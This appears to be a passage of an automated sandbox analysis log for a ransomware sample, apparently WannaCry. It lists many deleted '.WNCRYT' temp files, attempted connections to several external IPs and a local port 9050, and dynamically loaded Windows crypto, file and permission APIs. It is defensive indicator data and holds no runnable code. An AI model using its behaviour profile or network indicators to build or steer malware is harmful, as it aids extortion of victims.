DeletedFile: C:\Users\user\AppData\Local\Temp\278.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\279.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\28.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\280.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\281.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\282.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\283.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\284.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\285.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\286.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\287.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\288.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\289.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\29.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\290.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\291.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\292.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\293.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\294.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\295.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\296.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\297.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\298.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\299.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\3.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\30.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\300.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\301.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\302.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\303.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\304.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\305.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\306.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\307.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\308.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\309.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\31.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\310.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\311.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\312.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\313.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\314.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\315.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\316.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\317.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\318.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\319.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\32.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\320.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\321.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\322.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\323.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\324.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\325.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\326.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\327.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\328.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\329.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\33.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\330.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\331.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\332.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\333.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\334.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\335.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\336.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\337.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\338.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\339.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\34.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\340.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\341.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\342.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\343.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\344.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\345.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\346.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\347.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\348.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\349.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\35.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\350.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\351.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\352.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\353.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\36.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\360.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\361.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\37.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\38.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\39.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\397.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\398.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\399.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\4.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\40.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\400.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\401.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\402.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\403.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\404.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\405.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\406.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\407.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\408.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\409.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\41.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\410.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\411.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\412.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\413.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\414.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\415.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\416.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\417.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\418.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\419.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\42.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\420.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\422.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\423.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\424.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\425.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\426.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\427.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\428.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\429.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\43.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\430.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\431.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\432.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\433.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\434.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\435.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\436.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\437.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\438.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\439.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\44.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\440.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\441.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\442.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\443.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\444.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\445.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\446.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\447.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\448.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\449.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\45.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\450.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\451.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\452.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\453.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\454.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\455.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\456.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\457.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\458.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\459.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\46.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\460.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\461.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\462.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\463.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\464.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\465.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\466.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\467.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\468.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\469.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\47.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\470.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\471.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\472.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\473.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\474.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\475.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\476.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\477.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\478.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\479.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\48.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\480.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\481.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\482.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\483.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\484.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\485.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\486.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\487.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\488.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\489.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\49.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\490.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\491.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\492.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\493.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\494.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\495.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\496.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\497.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\498.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\499.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\5.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\50.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\500.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\501.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\502.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\503.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\504.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\505.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\506.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\507.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\508.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\509.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\51.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\510.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\511.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\512.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\513.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\514.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\515.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\516.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\517.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\518.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\519.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\52.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\520.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\521.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\522.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\523.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\524.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\525.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\526.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\527.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\528.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\529.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\53.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\530.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\531.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\532.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\533.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\534.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\535.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\536.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\537.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\538.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\539.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\540.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\541.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\542.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\543.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\55.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\56.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\57.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\58.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\59.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\6.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\60.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\61.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\62.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\63.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\64.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\65.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\66.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\67.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\68.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\69.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\7.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\70.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\71.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\72.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\73.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\74.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\75.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\76.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\77.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\78.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\79.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\8.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\80.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\81.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\82.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\83.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\84.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\85.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\86.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\87.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\88.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\89.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\9.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\90.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\91.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\92.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\93.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\94.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\95.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\96.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\97.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\98.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\99.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\397.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\398.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\402.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\403.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\405.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\407.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\408.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\409.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\454.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\455.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\456.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\518.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\519.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\520.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\521.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\78.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\397.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\398.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\402.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\403.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\405.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\407.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\408.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\409.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\454.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\455.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\456.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\518.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\519.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\520.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\521.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\78.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\397.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\398.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\402.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\403.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\405.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\407.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\408.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\409.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\454.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\78.WNCRYT
DeletedFile: C:\Users\user\AppData\Local\Temp\hibsys.WNCRYT
Makes WinAPI calls related to user discovery
Resolved address: wpad - {''}
Resolved address: config.edge.skype.com - {''}
Resolved address: ocos-office365-s2s.msedge.net - {''}
Attempts to connect to a dead IP:Port (8 unique times)
IP: 146.185.177.103:9030 (unknown)
IP: 163.172.35.247:443 (unknown)
IP: 37.187.102.186:9001 (unknown)
IP: 172.61.0.2:443
IP: 212.47.229.2:9001 (unknown)
IP: 193.23.244.244:443 (unknown)
IP: 127.0.0.1:9050
IP: 128.31.0.39:9101 (unknown)
Dynamic (imported) function loading detected
DynamicLoader: ADVAPI32.dll/CryptAcquireContextA
DynamicLoader: ADVAPI32.dll/CryptImportKey
DynamicLoader: ADVAPI32.dll/CryptDestroyKey
DynamicLoader: ADVAPI32.dll/CryptEncrypt
DynamicLoader: ADVAPI32.dll/CryptDecrypt
DynamicLoader: ADVAPI32.dll/CryptGenKey
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/MoveFileW
DynamicLoader: kernel32.dll/MoveFileExW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: CRYPTSP.dll/CryptAcquireContextA
DynamicLoader: CRYPTSP.dll/CryptImportKey
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: kernel32.dll/GetNativeSystemInfo
DynamicLoader: kernel32.dll/InitializeCriticalSection
DynamicLoader: kernel32.dll/SetFileAttributesW
DynamicLoader: kernel32.dll/SetFileTime
DynamicLoader: kernel32.dll/SetFilePointer
DynamicLoader: kernel32.dll/GetFileTime
DynamicLoader: kernel32.dll/GetFileSizeEx
DynamicLoader: kernel32.dll/MultiByteToWideChar
DynamicLoader: kernel32.dll/GetFileAttributesW
DynamicLoader: kernel32.dll/FindClose
DynamicLoader: kernel32.dll/FindNextFileW
DynamicLoader: kernel32.dll/FindFirstFileW
DynamicLoader: kernel32.dll/ExitThread
DynamicLoader: kernel32.dll/LeaveCriticalSection
DynamicLoader: kernel32.dll/EnterCriticalSection
DynamicLoader: kernel32.dll/Sleep
DynamicLoader: kernel32.dll/GetTempFileNameW
DynamicLoader: kernel32.dll/FlushFileBuffers
DynamicLoader: kernel32.dll/CopyFileW
DynamicLoader: kernel32.dll/WriteFile
DynamicLoader: kernel32.dll/CreateFileA
DynamicLoader: kernel32.dll/ReadFile
DynamicLoader: kernel32.dll/CreateThread
DynamicLoader: kernel32.dll/GetFileAttributesA
DynamicLoader: kernel32.dll/CreateMutexA
DynamicLoader: kernel32.dll/OpenMutexA
DynamicLoader: kernel32.dll/GetFullPathNameA
DynamicLoader: kernel32.dll/CopyFileA
DynamicLoader: kernel32.dll/CreateDirectoryW
DynamicLoader: kernel32.dll/GetTempPathW
DynamicLoader: kernel32.dll/GetWindowsDirectoryW
DynamicLoader: kernel32.dll/DeleteFileW
DynamicLoader: kernel32.dll/GetDiskFreeSpaceExW
DynamicLoader: kernel32.dll/MoveFileExW
DynamicLoader: kernel32.dll/CreateFileW
DynamicLoader: kernel32.dll/GetDriveTypeW
DynamicLoader: kernel32.dll/WideCharToMultiByte
DynamicLoader: kernel32.dll/InterlockedExchange
DynamicLoader: kernel32.dll/InterlockedExchangeAdd
DynamicLoader: kernel32.dll/GetLogicalDrives
DynamicLoader: kernel32.dll/DeleteFileA
DynamicLoader: kernel32.dll/SetCurrentDirectoryW
DynamicLoader: kernel32.dll/GetModuleFileNameW
DynamicLoader: kernel32.dll/DeleteCriticalSection
DynamicLoader: kernel32.dll/GetComputerNameW
DynamicLoader: kernel32.dll/GetCurrentDirectoryA
DynamicLoader: kernel32.dll/LocalFree
DynamicLoader: kernel32.dll/GetCurrentProcess
DynamicLoader: kernel32.dll/GetLastError
DynamicLoader: kernel32.dll/CloseHandle
DynamicLoader: kernel32.dll/GlobalAlloc
DynamicLoader: kernel32.dll/LoadLibraryA
DynamicLoader: kernel32.dll/GetProcAddress
DynamicLoader: kernel32.dll/GlobalFree
DynamicLoader: kernel32.dll/GetTickCount
DynamicLoader: kernel32.dll/CreateProcessA
DynamicLoader: kernel32.dll/WaitForSingleObject
DynamicLoader: kernel32.dll/TerminateProcess
DynamicLoader: kernel32.dll/GetExitCodeProcess
DynamicLoader: kernel32.dll/GetFileSize
DynamicLoader: USER32.dll/SystemParametersInfoW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/CryptExportKey
DynamicLoader: ADVAPI32.dll/CryptReleaseContext
DynamicLoader: ADVAPI32.dll/GetSecurityInfo
DynamicLoader: ADVAPI32.dll/SetEntriesInAclA
DynamicLoader: ADVAPI32.dll/SetSecurityInfo
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: ADVAPI32.dll/GetUserNameW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/CryptGenRandom
DynamicLoader: ADVAPI32.dll/CryptGetKeyParam
DynamicLoader: SHELL32.dll/SHGetFolderPathW
DynamicLoader: msvcrt.dll/fopen
DynamicLoader: msvcrt.dll/fprintf
DynamicLoader: msvcrt.dll/sprintf
DynamicLoader: msvcrt.dll/rand
DynamicLoader: msvcrt.dll/time
DynamicLoader: msvcrt.dll/srand
DynamicLoader: msvcrt.dll/wcscpy
DynamicLoader: msvcrt.dll/wcscat
DynamicLoader: msvcrt.dll/wcslen
